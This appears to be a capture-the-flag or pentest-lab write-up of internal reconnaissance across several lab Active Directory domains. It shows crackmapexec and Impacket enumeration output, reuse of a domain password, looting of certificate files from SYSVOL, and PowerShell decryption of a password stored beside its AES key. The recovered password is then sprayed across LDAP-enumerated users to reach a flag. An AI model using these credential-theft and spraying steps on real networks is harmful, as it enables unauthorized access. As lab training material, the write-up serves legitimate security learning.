Malleum Knowledge Base

Internal Recon

6 min read

Initial Compromise

Enumeration

Core.cyber.local

SMB         10.9.15.10      445    COREDC           [*] Windows 10.0 Build 14393 x64 (name:COREDC) (domain:core.cyber.local) (signing:True) (SMBv1:False)
 
SMB         10.9.15.12      445    COREWEBTW        [*] Windows 10.0 Build 14393 x64 (name:COREWEBTW) (domain:core.cyber.local) (signing:True) (SMBv1:False)
 
 
SMB         10.9.15.200     445    COREWKT001       [*] Windows 10.0 Build 18362 x64 (name:COREWKT001) (domain:core.cyber.local) (signing:True) (SMBv1:False)
 
SMB         10.9.15.201     445    COREWKT002       [*] Windows 10.0 Build 18362 x64 (name:COREWKT002) (domain:core.cyber.local) (signing:True) (SMBv1:False)
 
 
10.9.15.11    80    COREWEBDL

Cyber.local

HTTP        10.9.10.10      5985   CYDC 
HTTP        10.9.10.14      5985   CYFS 
HTTP        10.9.10.11      5985   CYADFS 
HTTP        10.9.10.12      5985   CYWAP  
HTTP        10.9.10.13      5985   CYMX            
HTTP        10.9.10.17      5985   CYGW

D3v.local

HTTP        10.9.30.10      5985   D3DC             [-] d3v.local\george.wirth:v765#QLm^8 
HTTP        10.9.30.12      5985   D3WEBJW          [-] d3v.local\george.wirth:v765#QLm^8 
HTTP        10.9.30.13      5985   D3WEBVW          [-] d3v.local\george.wirth:v765#QLm^8 
HTTP        10.9.30.200     5985   D3WKT001         [*] http://10.9.30.200:5985/wsman

Inception.local

SMB         10.9.40.5       445    INDC             [-] inception.local\george.wirth:v765#QLm^8 STATUS_LOGON_FAILURE
SMB         10.9.40.12      445    INWEBJW          [-] inception.local\george.wirth:v765#QLm^8 STATUS_LOGON_FAILURE
 
SMB         10.9.40.200     445    INWKT001         [-] inception.local\george.wirth:v765#QLm^8 STATUS_LOGON_FAILURE
SMB         10.9.40.201     445    INWKT002         [-] inception.local\george.wirth:v765#QLm^8 STATUS_LOGON_FAILURE

Having valid domain creds

  • No kerberoasting entries with george.wirth in core.cyber.local

On the website

To Everyone:

In an effort to increase our security posture, we have moved forward with user certificate authentication. If you haven’t had the opportunity to come into the office or are using your own devices, you can request a certificate via the certenroll API (see below). For more information on this process check out https://blogs.technet.microsoft.com/askds/2010/05/25/enabling-cep-and-ces-for-enrolling-non-domain-joined-computers-for-certificates/. If you’re still having issues email Ilene_Rasch@cyber.local over at Help Desk.

Furthermore,  we have started to roll out our network segmentation plan to only allow business related traffic. We also deployed Zabbix with an API to increase our systems/network visibility. The process is simple, the zabapi user logs in, collects information and sends it back to the console.

Requesting a user certificate can only be done from a windows machine

  1. Request a certificate from https://certenroll.cyber.local/ADPolicyProvider_CEP_UsernamePassword/service.svc/CEP  (Public IP: 10.10.110.11. Requires RootCA from the parent SYSVOL directory)

  2. Once you have a certificate you can authenticate to Email and Jenkins

User Email: https://mail.cyber.local/owa (Public IP: 10.10.110.12)

Jenkins: https://jenkins.cyber.local (Public IP: 10.10.110.12. Only DevOPS can authenticate to this portal)

Have a wonderful day!

So we need certificates

Accessing smb shares

Getting Certificates

smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.10.10'
/usr/local/bin/smbclient.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.12.0.dev1+20230921.20754.9c8f344b', 'smbclient.py')
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

Type help for list of commands
# use SYSVOL
# ls
drw-rw-rw-          0  Tue Dec 31 07:17:36 2019 .
drw-rw-rw-          0  Tue Dec 31 07:17:36 2019 ..
drw-rw-rw-          0  Tue Dec 31 07:17:36 2019 cyber.local
# cd cyber.local
# ls
drw-rw-rw-          0  Tue Dec 31 07:23:38 2019 .
drw-rw-rw-          0  Tue Dec 31 07:23:38 2019 ..
drw-rw-rw-          0  Thu Dec 14 04:16:17 2023 DfsrPrivate
drw-rw-rw-          0  Wed Jun 17 22:34:20 2020 Policies
drw-rw-rw-          0  Sun Jan 12 15:26:20 2020 scripts
# cd scripts
# ls
drw-rw-rw-          0  Sun Jan 12 15:26:20 2020 .
drw-rw-rw-          0  Sun Jan 12 15:26:20 2020 ..
-rw-rw-rw-       1472  Fri Jan 15 17:10:22 2021 ADFS-Token.cer
-rw-rw-rw-        468  Fri Jan 10 01:58:27 2020 cydc.cyber.local_Cyber-CA.crt
-rw-rw-rw-        200  Fri Jan 10 02:19:51 2020 Disable-NetBIOS.ps1
-rw-rw-rw-    1019904  Fri Jan 10 13:07:53 2020 LAPSx64.msi
-rw-rw-rw-       3723  Fri Jan 10 01:58:27 2020 WildCard.pfx
# mget *
[*] Downloading ADFS-Token.cer
[*] Downloading cydc.cyber.local_Cyber-CA.crt
[*] Downloading Disable-NetBIOS.ps1
[*] Downloading LAPSx64.msi
[*] Downloading WildCard.pfx
# exit

Enumerating other shares

smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.20.14'

# use GroupShare
# ls
drw-rw-rw-          0  Sat Dec 16 15:54:39 2023 .
drw-rw-rw-          0  Sat Dec 16 15:54:39 2023 ..
-rw-rw-rw-        298  Sun Jan 12 01:30:42 2020 aes.key
-rw-rw-rw-        278  Sun Jan 12 01:30:42 2020 passwd.txt
-rw-rw-rw-         95  Sun Jan 12 01:30:42 2020 ReadMe.txt

Decrypting Credentials from an SMB Share

While exploring an SMB share, I stumbled upon two intriguing files: aes.key and passwd.txt. Intrigued by their names and potential contents, I decided to investigate further. My first thought was that aes.key could be an encryption key, and passwd.txt likely contained encrypted data, possibly a password. To explore this hypothesis, I used a PowerShell environment on my Commando VM.

I started by loading the content of aes.key into a variable using the command:

$Key = Get-Content -Path C:\Users\jay\Desktop\aes.key

This command read the contents of the aes.key file and stored it in the $Key variable. Next, I needed to load the encrypted message from the passwd.txt file. I achieved this with the following command:

$EncryptedMessage = Get-Content -Path "C:\Users\jay\Desktop\passwd.txt"

With both the key and the encrypted message in hand, I was ready to attempt decryption. PowerShell offers a convenient way to handle encrypted strings through its SecureString object. I used the ConvertTo-SecureString cmdlet, which is designed to convert encrypted data into a SecureString object, using the key I had just loaded. The command was as follows:

$SecureStringPassword = $EncryptedMessage | ConvertTo-SecureString -Key $Key

Upon executing this command, the encrypted message was converted into a SecureString, a special kind of string in PowerShell that is used for handling sensitive information securely.

However, SecureString objects are not immediately readable. To view the decrypted password, I had to convert it back to a plain text string. This is a sensitive operation since it involves handling a password in an unencrypted form. To do this, I used the .NET class System.Runtime.InteropServices.Marshal which provides methods for dealing with unmanaged code. The commands were:

$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($SecureStringPassword)
$PlainTextPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($Ptr)

These commands converted the SecureString to a plain text string and then freed the allocated memory to maintain security. Finally, I displayed the decrypted password using:

echo $PlainTextPassword

The output revealed the decrypted password: to7oxaith2Vie9. This successful decryption indicated that the files I found were indeed a key and an encrypted password, and I had managed to uncover the latter using PowerShell’s capabilities.

Preparing for password spray
cme ldap 10.9.10.10 -u 'george.wirth' -p 'v765#QLm^8' -d core.cyber.local --users >> users.txt

awk '/LDAP/{print $5}' users.txt > only_users.txt
Password Spray
cme ldap 10.9.10.10 -u only_users.txt -p 'to7oxaith2Vie9'

LDAP        10.9.10.10      389    CYDC             [+] cyber.local\Robert.Ortiz:to7oxaith2Vie9

What can user robert.ortiz access

cme smb 10.9.10.14 -u robert.ortiz -p 'to7oxaith2Vie9' -d cyber.local --shares


smbclient.py 'cyber.local/robert.ortiz:to7oxaith2Vie9@10.9.10.14'

Type help for list of commands
# use devops
# ls
drw-rw-rw-          0  Sat Dec 16 19:24:21 2023 .
drw-rw-rw-          0  Sat Dec 16 19:24:21 2023 ..
-rw-rw-rw-         70  Mon Jun  8 00:51:39 2020 flag.txt
# cat flag.txt
Cyb3rN3t1C5{D3vOP$_S3cure_Cr3d$}

On Windows

Logon as a local computer administrator account.

  • You can add the Root CA certificate to the computers Trusted Root Certification Authorities store via the MMC:

    1. Open the Run command and type MMC.
      1. Select File then Add/Remove Snap-in
      2. Select Certificates, and click the Add > button.
      3. Select Computer Account, and click the Next button.
      4. Click the Finish button.
      5. Click OK
    2. Expand Certificates (Local Computer).
    3. Expand Trusted Root Certification Authorities.
    4. Right click on Certificates, and select All Tasks, and then select Import
      1. Certificate Import Wizard comes up.
      2. Click the Next button.
      3. Click the Browse… button and navigate to the CER file.
      4. Click the Next button.
      5. Leave the defaults, and click the Next button.
      6. Click the Finish button.

Using the Information obtained above for Lateral movement.

Lateral movement

Graph View